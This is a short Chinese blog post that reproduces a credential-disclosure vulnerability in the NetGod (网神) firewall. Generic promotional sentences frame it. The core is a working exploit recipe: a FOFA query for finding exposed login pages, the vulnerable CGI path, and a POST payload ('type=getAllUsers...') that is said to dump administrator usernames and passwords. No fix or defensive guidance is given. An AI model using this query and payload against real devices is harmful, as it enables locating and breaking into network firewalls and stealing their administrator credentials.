本文主要是介绍网神防火墙后台用户敏感信息泄露漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
简介
网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击。
该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。
漏洞复现
FOFA语法:
body="sec_gate_image/login_02.gif"
访问界面如下所示:
POC:
/cgi-bin/authUser/authManageSet.cgi
进行GET请求访问页面返回为空证明该文件存在可尝试进行测试
POST请求:
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
这篇关于网神防火墙后台用户敏感信息泄露漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!